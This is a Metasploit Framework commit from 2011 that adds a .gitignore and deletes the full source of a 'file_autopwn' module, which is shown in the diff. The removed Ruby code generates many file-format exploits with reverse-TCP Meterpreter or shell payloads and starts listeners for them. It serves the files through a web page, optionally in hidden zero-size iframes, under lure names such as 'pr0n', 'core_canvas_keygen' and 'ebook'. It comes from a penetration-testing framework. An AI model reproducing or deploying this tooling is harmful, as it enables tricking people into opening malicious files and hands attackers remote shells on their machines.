Add a gitignore and delete the broken file_autopwn code. Fixes #4964

2011-11-10 20:11:53 -06:00 · 2011-11-10 20:11:53 -06:00 · 43fa2c3d1b
parent 30a86c9378
commit 43fa2c3d1b
2 changed files with 3 additions and 458 deletions
--- a/.gitignore
+++ b/.gitignore
@ -0,0 +1,3 @@
 data/meterpreter/ext_server_pivot.dll
 data/meterpreter/ext_server_pivot.x64.dll
--- a/modules/auxiliary/server/file_autopwn.rb
+++ b/modules/auxiliary/server/file_autopwn.rb
@ -1,458 +0,0 @@
 ##
 # $Id$
 ##
 ##
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
 ##
 require 'msf/core'
 #require 'rex/exploitation/javascriptosdetect'
 class Metasploit3 < Msf::Auxiliary
 	include Msf::Exploit::Remote::HttpServer::HTML
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'        => 'File Format Exploit Generator',
 			'Version'     => '$Revision$',
 			'Description' => %q{
 				This module generates a combination of File format exploits and make them available to a client. 94.7% Based on browser autopwn by egypt.
 				},
 			'Author'      =>
 				[
 					'et',
 				],
 			'License'     => BSD_LICENSE,
 			'Actions'     =>
 				[
 					[ 'WebServer', {
 						'Description' => 'Deliver file format exploits in a web page with links to the actual files'
 					} ],
 					[ 'OnlyFiles', {
 						'Description' => 'Create file format exploits in selected directory'
 					} ],
 					[ 'list', {
 						'Description' => 'List the exploit modules that would be started'
 					} ]
 				],
 			'PassiveActions' =>
 				[ 'WebServer', 'Email' ],
 			'DefaultAction'  => 'WebServer'))
 		register_options([
 			OptAddress.new('LHOST', [ true,
 				'The IP address to use for reverse-connect payloads'
 			]),
 			OptString.new('OUTPUTPATH', [ true,
 				'The location of the files.', File.join(Msf::Config.get_config_root, 'exploits')
 			]),
 			OptBool.new('CREATEFILES', [ true,
 				'Set to false in case files are already in the defined path',
 				true
 			]),
 			OptBool.new('USECONTENTTYPE', [ true,
 				'Use Content-type header according to file extension. Many exploits may fail depending on this value',
 				true
 			]),
 		], self.class)
 		register_advanced_options([
 			OptString.new('MATCH', [false,
 				'Only attempt to use exploits whose name matches this regex'
 			]),
 			OptString.new('EXCLUDE', [false,
 				'Only attempt to use exploits whose name DOES NOT match this regex'
 			]),
 			OptBool.new('USEMODNAME', [false,
 				'Use module names as file names',
 				true
 			]),
 			OptBool.new('USEIFRAMES', [false,
 				'Deliver each file as an iframe in webserver',
 				false
 			]),
 			OptString.new('TITLE', [ true,
 				'The HTML page title.', 'WALL oF SHAME'
 			]),
 			OptString.new('COMMENT', [ true,
 				'HTML page text.', '<b>Welcome!</b><br>'
 			]),
 			OptPort.new('LPORT_WIN32', [false,
 				'The port to use for Windows reverse-connect payloads, default is 3333'
 			]),
 			OptPort.new('LPORT_MULTI', [false,
 				'The port to use for Multi reverse-connect payloads, default is 4444'
 			]),
 			OptPort.new('LPORT_MAC', [false,
 				'The port to use for Mac reverse-connect payloads, default is 5555'
 			]),
 			OptPort.new('LPORT_GENERIC', [false,
 				'The port to use for generic reverse-connect payloads, default is 6666'
 			]),
 		], self.class)
 		@exploits = Hash.new
 		@payloads = Hash.new
 		@targetcache = Hash.new
 	end
 	def run
 		storexp = File.join(Msf::Config.get_config_root, 'exploits')
 		Dir.mkdir(storexp) unless File.directory?(storexp)
 		if (action.name == 'list')
 			m_regex = datastore["MATCH"]   ? %r{#{datastore["MATCH"]}}   : %r{}
 			e_regex = datastore["EXCLUDE"] ? %r{#{datastore["EXCLUDE"]}} : %r{^$}
 			[ [framework.exploits, 'exploit' ] ].each do |mtype|
 				mtype[0].each_module do |name, mod|
 					m = mod.new
 					if ((m.kind_of? Msf::Exploit::FILEFORMAT) and name =~ m_regex and name !~ e_regex)
 						@exploits[name] = nil
 						print_line name
 						#print_line
 						#print_line m.description
 						#print_line
 						#print_line "Targets"
 						#
 						#begin
 						#	tout = Serializer::ReadableText.dump_exploit_target(m, '   ')
 						#	print_line tout
 						#rescue
 						#	print_error "Error retrieving targets in #{name}"
 						#end
 					end
 				end
 			end
 			print_line
 			print_status("Found #{@exploits.length} exploit modules")
 		elsif (action.name == 'WebServer')
 			if (!framework.db.active)
 				warn_no_database
 			end
 			start_exploit_modules()
 			if !datastore['CREATEFILES']
 				print_status("FILES NOT CREATED")
 			end
 			if @exploits.length < 1 and datastore["CREATEFILES"]
 				print_error("No exploits, check your MATCH and EXCLUDE settings")
 				return false
 			end
 			exploit()
 		elsif (action.name == 'OnlyFiles')
 			if (!framework.db.active)
 				warn_no_database
 			end
 			start_exploit_modules()
 			if @exploits.length < 1
 				print_error("No exploits, check your MATCH and EXCLUDE settings")
 				return false
 			end
 		end
 	end
 	def setup
 		#
 		# I'm still not sold that this is the best way to do this, but random
 		# LPORTs causes confusion when things break and breakage when firewalls
 		# are in the way.  I think the ideal solution is to have
 		# self-identifying payloads so we'd only need 1 LPORT for multiple
 		# stagers.
 		#
 		@win_lport =   datastore['LPORT_WIN32'] || 3333
 		@multi_lport = datastore['LPORT_MULTI'] || 4444
 		@osx_lport =   datastore['LPORT_MACOS'] || 5555
 		@gen_lport =   datastore['LPORT_GENERIC'] || 6666
 		minrank = framework.datastore['MinimumRank'] || 'manual'
 		if not RankingName.values.include?(minrank)
 			print_error("MinimumRank invalid!  Possible values are (#{RankingName.sort.map{|r|r[1]}.join("|")})")
 			wlog("MinimumRank invalid, ignoring", 'core', LEV_0)
 		end
 		@minrank = RankingName.invert[minrank]
 	end
 	def init_exploit(name, mod = nil, targ = 0)
 		if mod.nil?
 			@exploits[name] = framework.modules.create(name)
 		else
 			@exploits[name] = mod.new
 		end
 		modrank = @exploits[name].class.const_defined?('Rank') ? @exploits[name].class.const_get('Rank') : NormalRanking
 		if (modrank < @minrank)
 			@exploits.delete(name)
 			return false
 		end
 		case name
 		when %r{windows}
 			payload='windows/meterpreter/reverse_tcp'
 			lport = @win_lport
 		when %r{multi}
 			payload='windows/meterpreter/reverse_tcp'
 			lport = @multi_lport
 		#when %r{osx}
 			# Some day...
 			#payload='osx/meterpreter/reverse_tcp'
 		else
 			lport = @gen_lport
 			payload='generic/shell_reverse_tcp'
 		end
 		@payloads[lport] = payload
 		if datastore['CREATEFILES']
 			print_status("File Format exploit #{name} with payload #{payload}")
 		end
 		@exploits[name].datastore['SRVHOST'] = datastore['SRVHOST']
 		@exploits[name].datastore['SRVPORT'] = datastore['SRVPORT']
 		# For testing, set the exploit uri to the name of the exploit so it's
 		# easy to tell what is happening from the browser.
 		@exploits[name].datastore['OUTPUTPATH'] = datastore['OUTPUTPATH']
 		if (datastore['USEMODNAME'])
 			@exploits[name].datastore['FILENAME'] = name.gsub(/[\\\/]/, '_') + '_' + @exploits[name].datastore['FILENAME']
 		else
 			# Later change for some simple names
 			@exploits[name].datastore['FILENAME'] = filerename(File.extname(@exploits[name].datastore['FILENAME']))
 		end
 		@exploits[name].datastore['LPORT'] = lport
 		@exploits[name].datastore['LHOST'] = @lhost
 		@exploits[name].datastore['EXITFUNC'] = datastore['EXITFUNC'] || 'thread'
 		@exploits[name].datastore['DisablePayloadHandler'] = true
 		if datastore['CREATEFILES']
 			@exploits[name].exploit_simple(
 				'LocalInput'     => self.user_input,
 				'LocalOutput'    => self.user_output,
 				'Target'         => targ,
 				'Payload'        => payload,
 				'RunAsJob'       => true)
 			# It takes a little time for the resources to get set up, so sleep for
 			# a bit to make sure the exploit is fully working.  Without this,
 			# mod.get_resource doesn't exist when we need it.
 			Rex::ThreadSafe.sleep(0.5)
 			# Make sure this exploit got set up correctly, return false if it
 			# didn't
 			if framework.jobs[@exploits[name].job_id.to_s].nil?
 				print_error("Failed to start exploit module #{name}")
 				@exploits.delete(name)
 				return false
 			end
 		end
 		return true
 	end
 	def start_exploit_modules()
 		@lhost = (datastore['LHOST'] || "0.0.0.0")
 		print_line
 		print_status("Starting exploit modules on host #{@lhost}...")
 		print_status("---")
 		print_line
 		m_regex = datastore["MATCH"]   ? %r{#{datastore["MATCH"]}}   : %r{}
 		e_regex = datastore["EXCLUDE"] ? %r{#{datastore["EXCLUDE"]}} : %r{^$}
 		[ [framework.exploits, 'exploit' ] ].each do |mtype|
 			framework.exploits.each_module do |name, mod|
 				m = mod.new
 				if (m.kind_of? Msf::Exploit::FILEFORMAT) and name =~ m_regex and name !~ e_regex
 					next if !(init_exploit(name))
 				end
 			end
 		end
 		if action.name == 'OnlyFiles'
 			print_status "--- Done. Files created in #{datastore['OUTPUTPATH']}"
 			return
 		end
 		# start handlers for each type of payload
 		[@win_lport, @lin_lport, @osx_lport, @gen_lport].each do |lport|
 			if (lport and @payloads[lport])
 				print_status("Starting handler for #{@payloads[lport]} on port #{lport}")
 				multihandler = framework.modules.create("exploit/multi/handler")
 				multihandler.datastore['LPORT'] = lport
 				multihandler.datastore['LHOST'] = @lhost
 				multihandler.datastore['ExitOnSession'] = false
 				multihandler.datastore['EXITFUNC'] = datastore['EXITFUNC'] || 'thread'
 				multihandler.exploit_simple(
 					'LocalInput'     => self.user_input,
 					'LocalOutput'    => self.user_output,
 					'Payload'        => @payloads[lport],
 					'RunAsJob'       => true)
 			end
 		end
 		# let the handlers get set up
 		Rex::ThreadSafe.sleep(0.5)
 		print_line
 		print_status("--- Done, found %bld%grn#{@exploits.length}%clr exploit modules")
 		print_line
 	end
 	def on_request_uri(cli, request)
 		#
 		# I have NOT fixed dir. transversals!
 		#
 		print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}")
 		case request.uri
 		when self.get_resource
 			# This is the first request.
 			response = create_response()
 			response["Expires"] = "0"
 			response.body  = "<html > <head > <title > Wall of Shame </title> </head> "
 			response.body << "<body>"
 			response.body << "<h2>#{datastore['TITLE']}</h2><br>"
 			response.body << "#{datastore['COMMENT']}"
 			Dir.foreach(datastore['OUTPUTPATH']) do |entry|
 				if entry == '.' or entry == '..'
 					# do nothing
 				else
 					if !datastore['USEIFRAMES']
 						response.body << "<a href= #{self.get_resource+entry}>#{entry}</a><br>"
 					else
 						response.body << "<iframe style=\"width:0px; height:0px; border: 0px\" src=#{self.get_resource+entry}><b>#{entry}</b></iframe><br>"
 					end
 				end
 			end
 			response.body << "</body></html>"
 			cli.send_response(response)
 		when %r{^#{self.get_resource}.*}
 			fname = request.uri.gsub("#{self.get_resource}/","")
 			response = create_response()
 			response["Expires"] = "0"
 			if datastore['USECONTENTTYPE']
 				response["Content-type"] = ctype(File.extname(fname))['ctype']
 				if ctype(File.extname(fname))['cdisp']
 					response["Content-disposition"] = "attachment; filename=#{fname}"
 				end
 			else
 				response["Content-type"] = "application/octet-stream"
 				response["Content-disposition"] = "attachment; filename=#{fname}"
 			end
 			fullname = File.join(datastore['OUTPUTPATH'],fname)
 			if File.exist?(fullname) and File.file?(fullname)
 				src = File.open(fullname, "rb")
 				while (not src.eof?)
 					response.body << src.read(src.stat.size)
 				end
 				src.close
 				src = nil
 			else
 				print_status("404ing #{request.uri}")
 				send_not_found(cli)
 			end
 			cli.send_response(response)
 		else
 			print_status("404ing #{request.uri}")
 			send_not_found(cli)
 			return false
 		end
 	end
 	def filerename(ext)
 		#
 		# A sample way to change file name by type instead of using the ugly
 		# exploit name
 		#
 		case ext
 		when ".html" then
 			n = "pr0n" + Rex::Text.rand_text_numeric(4)
 		when ".exe" then
 			n = "core_canvas_keygen" + Rex::Text.rand_text_numeric(4)
 		when ".pdf" then
 			n = "ebook" + Rex::Text.rand_text_numeric(6)
 		when ".zip" then
 			n = "gibson_passwd" + Rex::Text.rand_text_numeric(4)
 		when ".xsl" then
 			n = "test" + Rex::Text.rand_text_numeric(2)
 		when ".m3u" then
 			n = "musical" + Rex::Text.rand_text_numeric(2)
 		else
 			n = "data" + Rex::Text.rand_text_numeric(4)
 		end
 		n << ext
 		return n
 	end
 	def ctype(ext)
 		aret = {}
 		#
 		# Need to force download as some exploits (i.e. pdf)
 		# dont work thru the browser only work when the file is saved and/or opened
 		#
 		# ctype:  Content-type
 		# cdisp:  true/false Include a "Content-disposition" header to force save as
 		case ext
 		when ".html" then
 			aret['ctype'] = "text/html"
 			aret['cdisp'] = false
 		when ".exe" then
 			aret['ctype'] = "application/octet-stream"
 			aret['cdisp'] = false
 		when ".pdf" then
 			#
 			# See comments above
 			# aret['ctype'] = "application/pdf"
 			aret['ctype'] = "application/octet-stream"
 			aret['cdisp'] = true
 		when ".zip" then
 			aret['ctype'] = "application/zip"
 			aret['cdisp'] = false
 		when ".xsl" then
 			aret['ctype'] = "text/xml"
 			aret['cdisp'] = false
 		when ".m3u" then
 			aret['ctype'] = "audio/x-mpegurl"
 			aret['cdisp'] = false
 		else
 			aret['ctype'] = "application/octet-stream"
 			aret['cdisp'] = false
 		end
 		return aret
 	end
 	def warn_no_database
 		print_error("WARNING: Database is disabled")
 	end
 end
		`@ -0,0 +1,3 @@`
							`data/meterpreter/ext_server_pivot.dll`
							`data/meterpreter/ext_server_pivot.x64.dll`